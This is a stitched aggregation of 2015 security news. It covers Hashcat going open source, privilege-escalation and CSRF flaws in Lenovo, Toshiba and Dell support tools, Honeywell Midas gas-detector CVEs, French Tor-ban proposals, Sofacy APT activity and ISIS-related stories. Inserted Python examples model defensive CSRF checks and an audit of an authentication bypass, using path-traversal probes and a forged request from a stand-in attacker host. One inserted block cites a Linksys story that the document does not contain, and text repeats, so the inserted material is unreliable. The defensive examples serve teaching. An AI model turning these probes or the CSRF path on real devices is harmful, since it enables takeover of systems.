“One of the main [password cracking tool] user-groups are penetration-testers. Their job is to evaluate the security in given areas including evaluation of password security. Also forensic-examiners use these tools in order to gain access to required evidence. These cases and tasks are often highly sensitive and apply to strict rules,” explained Marco Preuss. “OpenSource offers the possibility of developing customized extensions without leaking any potential sensitive information to external developers of such tools. This applies if different hash-algorithms are required to be audited while pentesting or specific requirements are set in forensic cases e.g. criminal evidence collection for an upcoming lawsuit.”

Steube will continue to support the Hashcat project:

“No way I’d do that! I’ll stay here, providing the same effort as before,” the developer said.

Every bug can be submitted to the development team, along with requests for new features.

Lenovo, Toshiba and Dell notebooks contain dangerous software

The number of security flaws found in the support software that notebook manufacturers preinstall keeps growing.

New flaws have been discovered in Lenovo Solution Center, Toshiba Service Station and Dell System Detect. The first of these appears to be the most vulnerable: on computers running Windows it can allow a skilled attacker to execute malicious code via a web page.

The flaws were discovered and reported by an independent hacker, prompting the CERT Coordination Center at Carnegie Mellon University to issue a security advisory.

One of the problems is caused by LSCTaskService, a service created by Lenovo Solution Center that runs with SYSTEM privileges. The service opens an HTTP daemon on port 55555 that accepts commands. One of them, called RunInstaller, works with files located in the %APPDATA%\LSC\Local Store folder.

Any user can write to this directory regardless of their privileges, but the files are executed as SYSTEM, which means that even an unprivileged user can exploit the flaw to gain full control over the system.

Thanks to a related flaw, the attacker does not even have to place their own files in that directory. And as if that were not enough, LSCTaskService is also vulnerable to cross-site request forgery (CSRF), an attack on web applications based on a request to perform a certain action in the application that the user did not intend and that originates from an illegitimate source.

This means that to exploit the first two flaws an attacker does not even need local access to the system on which Lenovo Solution Center is installed; it is enough to get the user to visit a malicious web page.
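The CSRF path described above works because a web page in the browser can make the browser send requests to 127.0.0.1:55555, and a local service that only checks "the request arrived on loopback" cannot tell those requests from its own UI's. The following is an added example, not Lenovo code, of the provenance check such a service should perform: reject requests whose Host header is not the service itself (DNS rebinding), reject any browser Origin/Referer other than its own, and require a per-session token that a foreign page cannot read. The port comes from the report; the header name X-LSC-Token, the token handling and the sample requests are assumptions constructed for the example. The separate bug (executing files from a user-writable directory as SYSTEM) is not addressed by this check and needs its own fix.

```python
"""Request-provenance check for a privileged localhost management service.
Added example; not Lenovo code. Header name and requests are constructed."""
import hmac
import secrets
from urllib.parse import urlsplit

SERVICE_HOST = "127.0.0.1:55555"        # where LSCTaskService listens (from the report)
SESSION_TOKEN = secrets.token_hex(16)   # assumed: issued only to the local UI process


def origin_of(headers):
    """Netloc of the Origin header (or Referer, if Origin is absent), lowercased."""
    value = headers.get("Origin") or headers.get("Referer")
    return urlsplit(value).netloc.lower() if value else None


def authorise(headers, token=SESSION_TOKEN):
    """Decide whether a command request (e.g. RunInstaller) may run.
    Returns (allowed, reason)."""
    # 1. The request must be addressed to us, not to a rebound DNS name.
    if headers.get("Host", "").lower() != SERVICE_HOST:
        return False, "Host header is not the service itself"
    # 2. A browser always adds Origin/Referer for cross-site requests; a
    #    native client normally sends neither, which is acceptable.
    origin = origin_of(headers)
    if origin is not None and origin != SERVICE_HOST:
        return False, f"cross-origin request from {origin}"
    # 3. A secret only the legitimate UI knows; a foreign page cannot read it.
    if not hmac.compare_digest(headers.get("X-LSC-Token", ""), token):
        return False, "missing or wrong session token"
    return True, "ok"


# Constructed requests: one a browser is forced to send by a malicious page,
# one from the legitimate local UI.
CSRF_REQUEST = {
    "Host": SERVICE_HOST,
    "Origin": "http://attacker.example",
    "Content-Type": "application/x-www-form-urlencoded",
}
UI_REQUEST = {
    "Host": SERVICE_HOST,
    "Origin": f"http://{SERVICE_HOST}",
    "X-LSC-Token": SESSION_TOKEN,
}

if __name__ == "__main__":
    for name, req in (("csrf", CSRF_REQUEST), ("ui", UI_REQUEST)):
        print(name, authorise(req))
```

The token check alone would already block the forged request, but the Origin and Host checks are cheap defence in depth: they stop the request before any command parsing happens, and they also cover clients that leak the token through a predictable location.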

The flaws in the other vendors’ products are less serious. Toshiba Service Station creates a service named TMachInfo that runs as SYSTEM and accepts commands over UDP port 1233. One of them, called Reg.Read, can be used to read most of the Windows registry as the SYSTEM user. “I don’t know what to use it for, but someone else might,” writes the hacker, who goes by the nickname slipstream, in his report.

The flaw found in Dell System Detect paradoxically arose from the fix Dell used to patch a different, earlier flaw. It concerns RSA-1024 signatures; the problem is reportedly that the company placed them on its website, where attackers can obtain and subsequently abuse them.

Lenovo said it will investigate the flaws and provide the necessary patches; until then, users can uninstall Lenovo Solution Center. Toshiba and Dell have not yet commented.

Stepping out of the dark: Hashcat went OpenSource

While passwords remain an essential topic in IT security, so do their recovery and cracking. Several tools focus on password recovery, and two of them stand out from the crowd: Hashcat/oclHashcat and John the Ripper (JtR).

We already mentioned Hashcat in our blog post on account password security.
Jens Steube, the mind behind Hashcat, also supported our research on the Gauss malware by creating oclGaussCrack.
At the beginning of this year we also asked for help with the Equation group MD5 “e6d290a03b70cfa5d4451da444bdea39”. Jens Steube and Philipp Schmidt solved it: the Arabic word for “unregistered”.

Last Friday, a “cryptic” message was posted on Twitter by @hashcat:


The MD5 revealed a major step for Hashcat: “hashcat open source”. Jens ‘atom’ Steube decided to go open source with his well-known password recovery/cracking tool Hashcat/oclHashcat. Over the weekend, the GitHub repository of Hashcat was among the top trending and had already collected more than 1,000 “stars”.



Hashcat and oclHashcat

This project implements a rich set of features of attacks against a long list of algorithms. Hashcat is for CPU-based hash cracking while oclHashcat uses GPUs.

Why Password cracking tools and OpenSource?

There are many reasons why such tools are needed. One of the main user-groups are penetration-testers. Their job is to evaluate the security in given areas including evaluation of password security. Also forensic-examiners use these tools in order to gain access to required evidence. These cases and tasks are often highly sensitive and apply to strict rules. OpenSource offers the possibility of developing customized extensions without leaking any potential sensitive information to external developers of such tools. This applies if different hash-algorithms are required to be audited while pentesting or specific requirements are set in forensic cases e.g. criminal evidence collection for an upcoming lawsuit.

The implemented functionality also pushes for stronger security by revealing insecure hash algorithms, vulnerabilities and weak passwords. This must not be underestimated, as driving the evolution and development of new secure algorithms is an important and necessary step (see Collision Vulnerabilities in MD5, SHA1 and SHA2).

Hashcat as open source under the MIT License now opens up possibilities for integrating other libraries and porting the software to other platforms. Hashcat may now also be integrated into Linux distributions, reaching a broader audience since it becomes even easier to install and use.

It’s difficult to foresee the future, but for sure we’ll see more development in this area – for a good reason.

Save the Date — 11th December: Anonymous to Celebrate 'ISIS Trolling Day'
After hacking and taking down social media accounts of ISIS members, the hacktivist group Anonymous is back with a new plan to harass the Islamic State (IS), the militant group behind the horrific terror attacks in Paris.
Anonymous declared total war against ISIS after the last month's Paris attacks and supposedly:
Took down thousands of Twitter and social media accounts used by the ISIS terrorists
Disrupted the terror group's primary communications platform
Replaced one of ISIS' websites with a Viagra ad
Now, the hacktivist group has declared December 11th to be "ISIS Trolling Day," planning an organized trolling campaign against ISIS by assaulting their image through Photoshopped images, memes, videos and jokes related to the terrorist organisation.
Also Read: ISIS Issues 5 Lame Tips for its Members to Avoid Getting Hacked
Vanish ISIS Online Presence
This campaign is also part of the group's ongoing effort to disrupt and dishonor the ISIS terror organization's online presence.
Western-living Muslims usually fall for ISIS' intimidating social media propaganda, so rebranding the militant group as a joke may be one of the best ideas Anonymous hackers ever had – attacking the ideas that ISIS is trying to spread online.
Anonymous has also asked netizens to be part of this trolling campaign as an effort to mock ISIS members and supporters for "the IDIOTS they are."
Also Read: Check Out How Anonymous Hackers Can Disrupt ISIS Online Propaganda
ISIS Trolling Day's Goals
According to a Ghostbin post, the trolling campaign will take place on Twitter, Facebook, Instagram, YouTube, and in the real world.
"We'll show them what they really are they don't stand for a religion, they don't stand for a God, they're brainwashers teaching from the young to the old their propaganda against the 'West' when in reality they're just increasing the distance between countries by giving many a bad name," the post reads.
Here are some of the campaign goals:
Use #Daesh or #Daeshbags (ISIS hates being called Daesh)
Post mocking photographs of ISIS on Instagram, Twitter, Facebook
Try to get #Daeshbags trending on Twitter
Post photographs of captured ISIS members and mock them
Use #'s that ISIS members use, but post mocking pictures instead
Make insulting videos of ISIS as well
Print out photos or stickers that mock ISIS and spread them around your city
JOIN US! DECEMBER 11, 2015! #OPISIS — Official #DayOfRage (@OpDayOfRage) December 5, 2015
Now let's see what real impact this campaign makes at the end of the day; free speech and mockery can be a far more powerful tool when fighting a war of ideas.

Critical vulnerabilities found in Honeywell Midas Gas Detectors

Another vulnerable IoT device is in the headlines; this time two serious vulnerabilities affect Honeywell Midas gas detectors.
Honeywell has just released firmware updates for its Midas gas detectors to fix two high-severity vulnerabilities.

The Midas gas detectors are a product line manufactured by Honeywell to detect toxic, ambient and flammable gases in the environment.

Midas gas detectors are typically used in light industrial manufacturing, university laboratories, semiconductor processing and aerospace. Any unauthorized change to the configuration of a detector could lead to wrong gas level measurements, which could cause serious damage to industrial equipment and even loss of human life.

According to security expert Maxim Rupp, Midas gas detectors running firmware versions 1.13b1 and prior, and Midas Black products running firmware versions 2.13b1 and prior, are affected by two serious flaws (CVE-2015-7907, CVE-2015-7908) that can be exploited without special skills.

The first flaw (CVE-2015-7907) is a path traversal vulnerability with a CVSS score of 8.6; it can be exploited by a remote attacker to bypass the authentication mechanism that protects the web interface.

Access to the web interface gives attackers full control over the configuration of the detectors; they can exploit it to launch calibration and test processes.

The second flaw (CVE-2015-7908), with a CVSS score of 9.4, concerns the transmission of user passwords: the secret codes are in fact transmitted in clear text.

“Successful exploitation of these vulnerabilities could allow a remote attacker to gain unauthenticated access to the device, potentially allowing configuration changes, as well as the initiation of calibration or test processes.” states the Advisory published by the ICS-CERT.

“Impact to individual organizations depends on many factors that are unique to each organization. NCCIC/ICS-CERT recommends that organizations evaluate the impact of these vulnerabilities based on their operational environment, architecture, and product implementation.”

Honeywell Midas gas detectors 2

Basically, the attacker can bypass authentication on vulnerable Midas gas detectors simply by typing the URL of the page they want to access, for example http://<host>/Network.htm. Rupp also discovered that the administrator password is embedded in clear text in the source code of the Security.htm page.
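Both this story and the Linksys EA6100-6300 one above describe the same class of bug: protected pages and CGI scripts are served to anyone who requests them by URL, and in the Midas case a path-traversal variant of the URL gets past whatever check exists. The following is an added example, not Honeywell or KoreLogic code, that models the flawed dispatch logic of an embedded admin interface next to a deny-by-default version, and an audit function that probes both without a session. The page table, the handler names and the assumption that the firmware normalises the path when serving the file but not when checking it are illustrative; only the page and script names (Network.htm, Security.htm, sysinfo.cgi, ezwifi_cfg.cgi) are borrowed from the two advisories.

```python
"""Forced browsing / path-traversal auth bypass: vulnerable vs. hardened dispatch.
Added example; not vendor code. Page table and behaviours are assumed."""
import posixpath

# Assumed page table for an embedded admin interface.
PAGES = {
    "/index.htm": "login form",
    "/login.cgi": "login handler",
    "/Network.htm": "network settings",
    "/Security.htm": "password settings",
    "/sysinfo.cgi": "system information",
    "/ezwifi_cfg.cgi": "wifi configuration",
}
PUBLIC = {"/index.htm", "/login.cgi"}   # everything else needs a session


def vulnerable_dispatch(raw_path, session_ok):
    """Two classic mistakes: authentication is enforced only for an explicit
    list of pages (forced browsing reaches the rest), and that list is matched
    against the raw request path while the file is served after normalisation,
    so '/x/../Security.htm' is served but never checked."""
    if raw_path == "/Security.htm" and not session_ok:
        return 401, "login required"
    page = PAGES.get(posixpath.normpath(raw_path))
    if page is None:
        return 404, "not found"
    return 200, page


def hardened_dispatch(raw_path, session_ok):
    """Deny by default: resolve the path first, then require a session for
    anything that is not explicitly public."""
    norm = posixpath.normpath(raw_path)
    if not norm.startswith("/") or "\x00" in norm:
        return 400, "bad path"
    page = PAGES.get(norm)
    if page is None:
        return 404, "not found"
    if norm not in PUBLIC and not session_ok:
        return 401, "login required"
    return 200, page


PROBES = ["/Network.htm", "/Security.htm", "/x/../Security.htm",
          "/sysinfo.cgi", "/ezwifi_cfg.cgi", "/index.htm"]


def audit(dispatch, probes=PROBES):
    """Probe without a session; report every non-public page served with 200."""
    leaks = []
    for path in probes:
        status, _ = dispatch(path, session_ok=False)
        if status == 200 and posixpath.normpath(path) not in PUBLIC:
            leaks.append(path)
    return leaks


if __name__ == "__main__":
    print("vulnerable:", audit(vulnerable_dispatch))
    print("hardened  :", audit(hardened_dispatch))
```

Against a real device the same audit is a list of unauthenticated GET requests for each known page (from the firmware image or the advisory), flagging any 200 that returns configuration data rather than the login form; a traversal probe such as `/x/../Security.htm` belongs in that list because it is exactly the shape of request that the raw-path comparison misses.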

Rupp reported the flaws to ICS-CERT, which forwarded them to Honeywell in July; the company fixed the vulnerabilities in October.

Honeywell urges its customers to apply the security patches and, in the meantime, to protect access to the Midas gas detectors, for example by placing them in a DMZ behind a firewall.

France wants to BAN Tor and Free Wi-Fi Services after Paris Terror Attacks
This was bound to happen sooner or later.
In the wake of the recent deadly Paris terror attacks, the French government is considering new laws that would ban access to free Wi-Fi and the Tor anonymity network, according to a recent report by the French newspaper Le Monde.
The report cites an internal document from the Ministry of Interior by French Department of Civil Liberties and Legal Affairs (DLPAJ) that lists two proposed bills – one around the State of Emergency and the other on combating counter-terrorism.
Last month's Paris attacks started a blame game, with some holding Edward Snowden and end-to-end encrypted services responsible for the ISIS-sponsored massacre.
Also Read: Anonymous declares War on ISIS: 'We will Hunt you Down!'
Now the government has renewed its assault on encryption and revived its efforts to force tech companies to hand over encryption keys, and the document obtained by Le Monde hints at the same.
Proposed Pieces of Legislation
State of Emergency Proposal: Under this law, the French government would forbid the use of free and shared Wi-Fi connections during a state of emergency. Owners of public Wi-Fi networks who fail to disconnect them could face criminal penalties.
According to the police, the reason for restricting access to free or shared Wi-Fi is that it is difficult to track suspects who use public Wi-Fi networks to communicate, so the law would shut down public hotspots during a state of emergency.
The state of emergency increases the powers of the police in the country. During the state of emergency, French police may search residences without a warrant, tighten border controls, and even ban public protests.
Proposal for Combating Counter-Terrorism: This proposal would ban or block communications over the Tor network and require service providers to hand over encryption keys to the police, not just during a state of emergency.
Indeed, in this section of the document, the Department of Civil Liberties and Legal Affairs questioned whether such proposed pieces of legislation might violate the French Constitution.
Also Read: Would Encryption Backdoor Stop Paris-like Terror Attacks?
The Onion Router, or Tor, is an anonymizing network maintained by volunteers, which routes users’ traffic through relays around the world, making it very hard (but not impossible) to identify the actual user behind the computer screen.
Tor is an easy tool to hide your real identity on the Internet and is used not only by journalists, whistleblowers, and privacy concerned people, but also by terrorists, pedophiles, and cyber criminals.
Both pieces of legislation, according to Le Monde, could appear as soon as January 2016.
If the block goes ahead, France would be the first European country to block Tor. Although there is no easy way to block the anonymizing network, China and Iran have both made successful attempts to block it.

Chakra JavaScript Engine: Microsoft Open-Sources the Heart of Edge browser
Chakra: The Open-Source JavaScript Engine of Microsoft Edge browser
Microsoft has announced the plans to open source the core components of its "Chakra" – the JavaScript engine behind the new Edge browser – to GitHub code-sharing and collaboration repository next month.
The company made this announcement at the JSConf US Last Call conference in Florida this weekend.
What is Chakra?
"Chakra," developed in 2008, is a self-contained JavaScript virtual machine that Microsoft will now let developers embed in their own products and applications.
Though Chakra is best known as the engine of Microsoft's Edge, it is also used across the company's newest operating system, Windows 10, to power Universal Apps on Xbox, Windows Phone and tablets.
Chakra Going Open Source as ChakraCore
ChakraCore – is what Microsoft is calling the open source version of its Chakra – will be made available on GitHub under an MIT open source license in January 2016, with support from Intel, AMD, and NodeSource.
According to the Microsoft's official blog, "We're investing more than ever in improving Chakra and are excited to team up with our community to drive further improvements. In addition to the public [Microsoft means the 'open source community'], several organizations have already expressed interest in contributing to ChakraCore — among many others, we look forward to working with Intel, AMD and NodeSource as we develop this community."
ChakraCore Doesn't Include:
There are some differences between ChakraCore and the Chakra that ships in Windows 10. The complete Chakra contains the glue between:
The JavaScript engine and the browser's HTML engine
The JavaScript engine and the Universal Windows Platform
Chakra also has diagnostic APIs (Application Program Interfaces) that use COM and hence are Windows-specific.
However, neither of the above are part of the open source ChakraCore project. It only contains the 'core packages' for the engine, so doesn't expose Chakra's private bindings to the Edge browser or Universal Applications or make available COM diagnostic APIs.
What Does Chakra Offer?
The fully supported and open source ChakraCore project includes:
The parser
The interpreter
The JIT (just-in-time) compiler
The Garbage collector
The application programming interface (API) used to embed the engine into apps (like used in Edge)
It's an interesting and impressive move from the company like Microsoft that has rarely open sourced its projects. With this move, the company believes ChakraCore will be used in a large number of apps in the future, from cloud services to the Internet of Things (IoT).
Isn't that an exciting New Year gift for developers?

Arabian tales by ‘Nigerians’
7 December 2015, Source: Kaspersky
The war in Syria, which began several years ago, has recently become one of the most widely reported events in the media. Along with the growing interest of the international community in Middle East events, “Nigerian” scammers have also jumped on the bandwagon. Over the last few months, we have recorded an increase in the number of fraudulent emails utilizing the Syrian theme.

The authors of most of the emails introduced themselves as Syrian citizens seeking asylum in Europe and requested assistance in investing large sums of money. The messages were either short, with just enough information to arouse the recipient’s interest, or provided a detailed description of the offer.


Fraudsters often send out emails on behalf of women whose husbands have supposedly been killed or died. This theme was exploited with little or no change in the Syria-related emails. A “widow” writes that her husband has been killed and that she now has a large sum of money she wants to transfer to another country; she usually wants to get out of Syria too.


Fraudsters can also distribute emails on behalf of employees or owners of companies. To make the email more convincing, the text may include the names of real organizations. The authors of the emails provide a variety of stories to hook the recipient. For example, one of them says he has successfully transferred his assets to France but could not get a visa, so he is asking for help in case he cannot get to Europe.


The scammers try not only to get recipients interested by promising financial rewards but also to evoke pity and compassion. In particular, the pseudo-Syrian citizens complain of harassment by the president and ask for help transferring and preserving their money.


English is the most popular language with the “Nigerian” scammers; however, we have come across emails in other languages: German, French and Arabic. The author of a German-language email introduced himself as an officer of the Syrian army fighting against ISIS; he writes that he wants to move $16 million earned by selling oil out of the country, and asks the recipient to contact him for more information. In particular, the fact that the citizens of Syria and other Arab countries have large amounts of money is often explained by various stories related to oil deals.


An email in French is written on behalf of a young Syrian refugee whose relatives were killed in the war in Syria and who is now staying in Germany. She complains about the unbearable cold in the tent she lives in, and about the promises of the authorities to improve the living conditions which are never fulfilled. She asks the recipient to take her in in exchange for a large sum of money.


Finally, the emails in Arabic, the official language of Syria, tell a sad story about a widow from Damascus, whose husband and children were killed during a bombardment using chemical weapons. The tale of the unhappy woman is intended to evoke the recipient’s sympathy while also mentioning a large sum of money that should tempt the recipient to help.


“Nigerian” scammers are trying to make their stories believable so they are using a standard set of tricks: links to legitimate news sources, detailed emotive stories where real events are mentioned, including well-known personalities, etc. However, it is worth remembering that emails from unknown senders offering you millions of dollars cannot be genuine. Therefore, the best solution is to simply delete the email and not enter into correspondence with the scammers.

Cyber spies of the Sofacy APT increased its operations tenfold

According to a new report published by Kaspersky Lab, the Sofacy APT has recently increased its activity.
According to a new report published by Kaspersky Lab, the advanced persistent threat group Sofacy (also known as APT28, Fancy Bear, Sednit and STRONTIUM) has stepped up its operations.

The Sofacy group has been active since 2008, targeting mostly military and government entities in NATO countries; the experts believe it is a nation-state actor.

The experts report that Sofacy has increased its operations tenfold, targeting high-profile entities with a new set of hacking tools.

In recent months, the researchers have uncovered a series of attacks relying on a new set of tools and zero-day exploits and targeting defense-related entities, with a specific focus on Ukraine.

“In the months leading up to August, the Sofacy group launched several waves of attacks relying on zero-day exploits in Microsoft Office, Oracle Sun Java, Adobe Flash Player and Windows itself. For instance, its JHUHUGIT implant was delivered through a Flash zero-day and used a Windows EoP exploit to break out of the sandbox,” states a blog post published by Kaspersky Lab.

sofacy eng_1

The experts spotted a rare modification of the AZZY backdoor, which the threat actors use for initial reconnaissance. The first versions of AZZY were discovered in August; once the attackers have compromised a target they deploy further backdoors for lateral movement.

“The attackers deploy a rare modification of the AZZY backdoor, which is used for the initial reconnaissance. Once a foothold is established, they try to upload more backdoors, USB stealers as well as other hacking tools such as “Mimikatz” for lateral movement,” continues the post.

Kurt Baumgartner, principal security researcher at Kaspersky Lab, explained that the Sofacy group is technically very capable and able to design new hacking tools for a specific target.

“This quick work is a new characteristic of their work, and this stepped up urgency is something that is unusual. In general, APT intrusions can last months or longer, and in these cases, we see Sofacy acting with unusually ramped urgency,” Baumgartner said.

We will continue to follow the operations of the Sofacy APT group, stay tuned …

ISIS members have developed a mobile app for its communications

Ghost Security Group has reportedly discovered an Android mobile application used by members of the ISIS organization for secure communications.
According to the Christian Science Monitor, the Ghost Security Group has reportedly discovered an Android mobile app used by members of the ISIS organization.

The Ghost Security Group is a well-known group of counter-terrorism cyber experts involved in a series of online initiatives against the ISIS radical group.

In July, the group supported US law enforcement and intelligence agencies in thwarting ISIS terror plots in New York and Tunisia.

The Android app discovered by the experts is distributed through hidden channels in popular messaging apps such as Telegram. ISIS members developed it as an alternative communication channel; the app is reportedly used to spread propaganda and share information on the group’s operations.

“They want to create a broadcast capability that is more secure than just leveraging Twitter and Facebook,” Ghost Security Group chief operating officer Michael Smith II told the Christian Science Monitor. “Increasingly what you will see is the focus on developing means to control the distribution of their materials on a global scale.”

The discovery made by the Ghost Security Group demonstrates the cyber capabilities of the terrorist group, capabilities that prominent experts, including F-Secure Chief Research Officer Mikko Hyppönen, have discussed in the past.

Hyppönen has said he worries about cyber extremists that could penetrate critical infrastructure and cause serious damage. He explained that ISIS is probably the first terrorist group with the hacking capabilities to mount a major attack against government infrastructure, and that the situation is getting worse as the group becomes more aware of how effective an offensive launched from cyberspace can be.

“The Islamic State is the first extremist group that has a credible offensive cyber capability,” said F-Secure Chief Research Officer Hyppönen, speaking last week at the Wall Street Journal’s WSJDLive conference in Laguna Beach, Calif. “Clearly, this situation isn’t getting better. It’s getting worse.”

At the moment the US Congress is discussing the role of encryption in commercial products and services, and its potential abuse by radical groups.

ISIS mobile app 2

Intelligence agencies and law enforcement bodies worldwide claim that terrorists have exploited the encryption implemented in commercial communications platforms to arrange terrorist attacks, including the one that hit Paris on November 13.

In August, a US security consultancy discovered another app, dubbed Nasher, developed by members of ISIS. In that case too, the Android app was spread through unofficial channels: users had to download a special code shared among jihadist online communities and install the app on their device manually.

Islamic State uses the app – which it calls Nasher – to catalogue written reports, radio news and video files.

At the time of writing, the landing page for the app’s APK (Android application package) file had been viewed over 7,500 times, although there is no telling how many downloads were made.

ISIS mobile app-download-page

The French Gov wants to Block Tor and Forbid Free Wi-Fi

In response to the recent Paris terror attacks, the French government is proposing to forbid and block the use of the Tor anonymity network.

This is according to an internal document from the Ministry of the Interior seen by journalists at the French newspaper Le Monde. The document includes two legislative proposals, one around the state of emergency and the other related to counter-terrorism measures.

The French government is considering to “forbid free and shared wi-fi connections”; the measure is intended to prevent abuse of public Wi-Fi networks, since law enforcement finds it difficult to track suspects and terrorists who use them.

The most controversial part of the proposal concerns the ban on the Tor network; the legislation could be presented as early as January 2016.

Is Tor the devil’s instrument?

Tor is the most popular anonymizing network and is currently maintained by volunteers. The anonymity of its users is ensured by routing their traffic along unpredictable paths through its network of relays, obscuring the source of the data and masking the user’s IP address.

The Tor network is accused of being a kingdom of evil: it hosts darknet marketplaces where it is possible to acquire any kind of illegal product or service, including drugs, child pornography, weapons and malware.

But we cannot ignore the importance of Tor: it allows journalists, whistleblowers and people who just want to protect their privacy online to avoid censorship.

The Tor Project, the team that actually maintains the Tor network, did not immediately comment on the news.

The Chinese authorities actively block connections to the Tor network, preventing users from reaching it. The block works by denying access to the public Tor entry nodes; however, even in countries with strict control of the network it is possible to use non-public entry nodes, so-called “bridges,” to evade the censorship.

Is France ready to implement the Chinese censorship model? Is it constitutional? Is this a good way to prevent terrorist actions?

Let’s take a look at Tor usage in France in 2015 by analyzing the number of directly connecting users.

tor metrics France 2015

Focusing the analysis on the period before the Paris attacks, an increase in connections in October is noticeable.

Tor users metrics France attacks

There could be a number of causes for the increase, including a botnet that used the Tor network to hide its C&C infrastructure. In any case, in the days just before and after the attacks there was nothing unusual.

It’s my personal opinion that banning the Tor network is a bad choice; there are several other options to stay online anonymously, and recently we have also discussed the use of applications that could allow terrorists to exchange messages while hiding their identities.

Regarding public WiFi, it could be a reasonable measure, but it is quite easy to find a poorly protected WiFi network to abuse. I made an experiment walking around my city, Napoli. I noticed an impressive number of WiFi networks that were apparently protected but used the default settings of their routers. Knowing the model of the router, it is quite easy to find the login credentials online. This circumstance would not be prevented by the measure proposed by the French government.

3 OEMs Vulnerable To 3 Vulnerabilities. Your PCs At Risk

Bad news for PC users: Lenovo machines can be hijacked by visiting a malicious website, while Dell and Toshiba PCs are affected by serious flaws.
Security researcher slipstream/RoL posted proof-of-concept exploits online (under the title “3 OEMs Vulnerable To Three Vulnerability Your PCs At Risk”) demonstrating how to compromise machines available on the market.

US CERT has issued an alert about the vulnerabilities affecting Lenovo machines, and the Chinese firm is urging users to uninstall its Solution Center as soon as possible.

“By convincing a user who has launched the Lenovo Solution Center to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), an attacker may be able to execute arbitrary code with SYSTEM privileges. Additionally, a local user can execute arbitrary code with SYSTEM privileges,” said CERT, which is backed by the US Department of Homeland Security.

“The CERT/CC is currently unaware of a practical solution to this problem. However, please consider the following workaround: uninstall Lenovo Solution Center to prevent exploitation of these vulnerabilities. Closing any running instance of Lenovo Solution Center also prevents exploitation.”

The Lenovo Solution Center security advisory posted on the company’s website confirms that the company is urgently working on a fix.

“We are urgently assessing the vulnerability report and will provide an update and applicable fixes as rapidly as possible. Additional information and updates will be posted to this security advisory page as they become available,” states the advisory.

Mitigation strategy for customers (what you should do to protect yourself), from the Lenovo Solution Center advisory: “To remove the potential risk posed by this vulnerability, users can uninstall the Lenovo Solution Center application using the add / remove programs function.”

“By the way, the Lenovo Solution Center flaw is also exploitable remotely via CSRF, if the Lenovo Solution Center is open! Open Lenovo Solution Center and click here for a SYSTEM shell!” the security researcher said.

You can fetch exploit binaries and source code from oemdrop.

Summarizing the security vulnerabilities, according to CERT and Slipstream:

Lenovo Solution Center creates a process called LSCTaskService that runs with full administrator rights, and fires up a web server on port 55555. It can be instructed via GET and POST HTTP requests to execute code in a directory a local user can access.
Lenovo Solution Center will execute, again with full privileges, programs found in an arbitrary location on disk where the user can write to. Put some bad software in there, and it will be executed with admin rights.
A classic cross-site request forgery (CSRF) vulnerability exists in the LSCTaskService process, allowing any visited webpage to pass commands to the local web server to execute with full privileges.

Dell’s bundled utility Dell System Detect can be made to gain admin privileges and execute arbitrary commands: a token granting Dell System Detect permission to install manuals can be abused to execute programs (such as malware) with admin privileges. This can be exploited by software on your computer to fully compromise the machine.

Toshiba’s bundled Service Station tool can be abused by normal users and unprivileged software to read the majority of the operating system’s registry as a SYSTEM-level user.
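
The LSCTaskService summary above describes the pattern to look for in any privileged local web service: a listener on a fixed loopback port that does work for whoever connects, so that any web page the user visits can drive it. The following is an added example, not Lenovo’s code or the researcher’s proof of concept, of the request checks such a service needs before acting: it refuses GET, rejects requests that carry a foreign Origin or Referer, verifies the Host header against the loopback listener and requires a per-process secret that a web page cannot know. Port 55555 is taken from the page; the token header name and the token scheme are assumptions.

```python
import hmac
import secrets
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

# Port from the CERT/slipstream description of LSCTaskService.
LISTEN_PORT = 55555
# Hostnames a request may legitimately come from or be addressed to.
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}
# Per-process secret handed only to the legitimate client (e.g. through a file
# that only that client can read); a web page has no way to learn it.  The
# header name X-Session-Token below is an assumption of this example.
SESSION_TOKEN = secrets.token_hex(32)


def _hostname(value: str) -> str:
    """Hostname part of an absolute URL or of a Host header value, lowercased."""
    if "://" not in value:
        value = "//" + value          # make a bare host[:port] parse as netloc
    return (urlsplit(value).hostname or "").lower()


def is_cross_site(headers: dict) -> bool:
    """True when the request evidently comes from a browser acting for a foreign
    page.  Browsers attach Origin to cross-origin POSTs and Referer to most
    other loads; "null" marks an opaque origin (sandboxed frame, file://)."""
    for name in ("Origin", "Referer"):
        value = headers.get(name)
        if value is None:
            continue
        if value == "null" or _hostname(value) not in LOCAL_HOSTS:
            return True
    return False


def is_authorized(method: str, headers: dict) -> bool:
    """Decision for the privileged endpoint.  Accept only if the request is a
    POST (a GET reachable via <img src=...> must never do work), is not
    cross-site, is addressed to the loopback listener (DNS-rebinding guard),
    and carries the session token, compared in constant time."""
    if method != "POST" or is_cross_site(headers):
        return False
    if _hostname(headers.get("Host", "")) not in LOCAL_HOSTS:
        return False
    token = headers.get("X-Session-Token", "")
    return hmac.compare_digest(token.encode(), SESSION_TOKEN.encode())


class TaskHandler(BaseHTTPRequestHandler):
    """Illustrative handler wired to the decision above; the privileged action
    is a placeholder, not anything LSCTaskService does."""

    def _headers(self) -> dict:
        return {k.title(): v for k, v in self.headers.items()}

    def do_GET(self):
        self.send_error(405, "this endpoint does no work on GET")

    def do_POST(self):
        if not is_authorized("POST", self._headers()):
            self.send_error(403, "cross-site or unauthenticated request")
            return
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"privileged action would run here\n")


if __name__ == "__main__":
    # Bind to loopback only; 0.0.0.0 would expose the service to the LAN.
    HTTPServer(("127.0.0.1", LISTEN_PORT), TaskHandler).serve_forever()
```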
Remove Bloatware From Windows With Decrap My Computer

Decrap My Computer allows you to easily and safely remove all of the bloatware that comes pre-installed by the manufacturer on a new Windows PC. It can take hours or even days to get all the pre-installed software removed from your new computer, but with this little freeware utility you can completely uninstall all the unneeded software.

Best of all, Decrap My Computer can do all the operations needed to remove bloatware on its own, without any user input! It even clicks the usual “Next” and various other confirmation buttons of most common software uninstallers.

See how it works!

This video shows Decrap My Computer removing all the pre-installed software from a brand new Acer Aspire V3 laptop. Notice that after the final confirmation box has been closed there is zero user input; all the uninstallers are run automatically by the Decrap My Computer program!

ISIS recruited experts set to wage chemical and biological attacks

A European Parliament report has warned that ISIS has already smuggled CBRN material into the EU; the risk of WMD attacks is real.
Intelligence experts suspect that ISIS has recruited experts with chemistry, physics and computer science degrees to wage attacks with weapons of mass destruction.

